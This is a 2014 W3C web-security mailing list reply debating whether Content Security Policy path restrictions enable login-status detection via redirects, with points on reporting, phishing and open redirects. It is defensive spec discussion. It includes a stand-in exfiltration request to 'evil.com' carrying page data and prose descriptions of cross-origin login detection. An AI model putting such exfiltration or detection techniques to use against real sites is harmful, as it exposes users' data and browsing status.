Re: Remove paths from CSP?

Hi Sigbjorn!

On Tue, May 27, 2014 at 11:31 AM, Sigbjørn Vik <sigbjorn@opera.com> wrote:

> CSP allows more than just login detection, and makes login detection
>  even easier.


What are the risks beyond login detection?

>From (the explanation of) your link: "It seems LinkedIn and Tumblr are
> currently immune to this" So the author put in a lot of effort trying to
> detect login status of these sites, and failed. With CSP it would work
> with minimal effort, and the sites couldn't protect against it, even if
> they wanted to.
>

You elided the rest of the sentence: "It seems LinkedIn and Tumblr are
currently immune to this, _though I didn’t dig too deep_ so there might be
another redirect URL for them."

More saliently, if Tumblr indeed doesn't fall prey to this attack, then it
_also_ doesn't fall prey to the CSP-based variant. Both are mechanisms of
detecting a redirect; if the redirect doesn't happen, CSP won't catch it
either.

Removing these issues in a spec might not be web-compatible. Removing
> them for a site owner is doable.


I don't think I agree with this. Timing attacks and esoterica that Michal
outlined in earlier posts[1] aside, if the platform allows you to read the
size of an image cross-origin, then you can tell whether you got an image
or something that wasn't an image. That's enough in the example I provided.
Can you elaborate on a site owner's secure response here?

[1]: http://lists.w3.org/Archives/Public/public-webappsec/2014Feb/0132.html

Removing the hole introduced by CSP is
> not doable for a site owner, even if wishing to do so.
>

Sure it is: for example, rather than automatically redirecting, the site
could return a 403 response with a link to the login form if the user isn't
logged in. That would still be vulnerable to a number of the attacks we've
discussed here, but not the CSP variant.


> > 2.  Reporting provides herd immunity; even in a world where extensions
> are
> >     accidentally blocked by bad browser implementations (I know Blink
> >     has some bugs),
>
> I don't follow this.
>

If lots of users are hitting your site, and you're getting violation
reports when one of them is attacked via content injection, then you have
the ability to fix that hole for everyone else, even if they were never
exposed.


> Reporting is good, agreed. If reporting is what we are after, there are
> other ways to do this, CSP is not a spec designed to provide webmasters
> with optimal reporting tools, and is not the only solution to reporting.
> Reporting can be done better and more secure in other ways.
>
> If we are serious about reporting, let us make a much better tool for
> that, without the security issues, and which can be used not only to
> determine the viability of CSP, but other site issues as well. Random
> example; I would love to see a spec for a page to determine the security
> level a browser awards it - CSP reporting can't do this, and it would be
> silly to have one reporting tool for CSP and another for this.
>

Would you mind forking this thread with a more detailed description of what
you're proposing here? I don't really understand either the complaint or
the suggestion here.


> In the network layer, if the page is blocked by CSP, replace it with
> blank contents, and continue as normal. No DOM changes necessary.
> Calling it "not trivial" might have been an exaggeration. :)
>

How is that different/better than returning a network error, which is what
the spec currently asks for?


> > Second, it removes CSP's
> > ability to
> > prevent data exfiltration (as we'd have to load the resources to grab
> image
> > dimensions and so on). I think I must be misrepresenting this suggestion,
> > because it seems unworkably hard to me.
>
> I don't understand what ability CSP has to prevent data exfiltration,
> could you please explain? I tried analyzing this in an earlier mail[1],
> but got no responses, so I still don't see any anti-CSRF powers in CSP.
> Or did you have something else in mind? Remember that it is the origin
> which is protected by CSP, not the target.
>

If you set a policy of `default-src 'none'`, then it is difficult for
injected content to exfiltrate data, as the requests to `
evil.com/?lots-of-juicy-data` will be blocked before they hit evil.com.

If we allow the request to go through so that we can grab image sizes, for
instance, then we lose the ability to prevent that connection.

Let me quote you ;)
> "More to the point, please assume that I and everyone like me is a
> terrible programmer. :)"
> I do not believe most web developers are going to read the CSP spec, far
> less understand it. I believe most will find a working template on
> stackoverflow, and copy it in uncritically.
>

In that sad, sad world where no one reads specs, I fail to see how you can
claim that developers be _more_ confused. They'd already have no idea
what's happening, and relying on magic safety dust that they sprinkle
around their sites. :)


> > At worst, we end up in a world where path restrictions don't exist for
> > developers who inadvertently allow redirects into otherwise whitelisted
> > paths.
> > They still have origin-based protections of CSP 1.0. I see that as a
> > reasonable
> > baseline, though I would certainly appreciate any suggestions that didn't
> > involve that compromise.
>
> I think this is much closer to the best case scenario.


In the current proposal, `script-src example.com/js` is equivilant to
`script-src example.com` after a redirect. This isn't the best-case
scenario: it is _the_ scenario. :)


> Developers may
> apply CSP, believe they have secured their sites, and leave it at that.
> They don't know that open redirects stop path restrictions from working,
> nor that another part of the site has an open redirect. Since they left
> the security of the site with CSP, and it doesn't work, they are now
> worse off than without CSP.


Developers who do this are, bluntly, out of luck. CSP mitigates risks. It
isn't magic, and it isn't perfect. We explicitly state in the spec (3rd
paragraph of the introduction) that CSP isn't the first (or only!) line of
defense, and is intended as defense in depth. What else would you like us
to do to make that clear?


> So the worst case scenario is that sites get
> even less secure then before.
>

I don't understand this conclusion. Again, `script-src example.com` is
still significantly better than nothing. Script can't load from `evil.com`,
for instance. That seems like a significant improvement.


> To weigh the risks, it is important to understand the threats.
> Currently, phishing is by far the largest threat on the net, XSS is
> miles behind. If phishing is critical severity, then XSS is only high
> severity.


They're both bad. I continue to believe that XSS is more problematic, but
I'm not sure there are any good arguments to be made either way. Bad is
bad. Badder is also bad. Either way: bad.


> The more a phisher can know about a user, the more convincing
> phishes can be made, and redirection detection will give phishers more
> power.
>

Let's explore this a bit, as you're correct: it's important.

1. Targeted (spear) phishing is quite a bad threat. It, however, relies on
knowledge of the target. If you're an attacker targeting _me_, you'll know
that I use Google and Twitter. If you're an attacker targeting Codero.com
so you can own the RSA conference site, you're going to phish with the
Codero login page. CSP is not a relevant vector of gathering this
information for these types of attacks.

2. Anecdotally, untargeted phishing comes via email ("You totally need to
verify your PayPal account, really."), where (I hope) it isn't possible
execute meaningful JavaScript in order to mutate the message to target the
entities to which I'm logged in.

What is the scenario in which a CSP-based attack gives you leverage over a
user in ways that (significantly?) increase the risk of phishing?

So the way I see it, CSP exacerbates the worst threat on the internet,
> and leaves no recourse possible.


Well, no recourse that continues to be user friendly and automatic. A
developer could certainly just not redirect (403 response) for unknown
users, as noted above.


> On the good side, it allows
> knowledgeable webmasters (a small percentage of all webmasters) yet
> another way to protect themselves against a non-critical security risk.
>

I think that's all we can do: we build something that can help, and do our
best to inform developers about its existence.


> However, if attempted by non-knowledgeable webmasters, they risk making
> their site less secure.
>

Any policy, no matter how poorly constructed, is purely restrictive. "No
inline script." "No CSS except from these 8,000 sources." etc. I do not
understand the claim that _any_ policy makes a site less secure. That
shouldn't be possible.

-mike

Received on Wednesday, 28 May 2014 12:16:04 UTC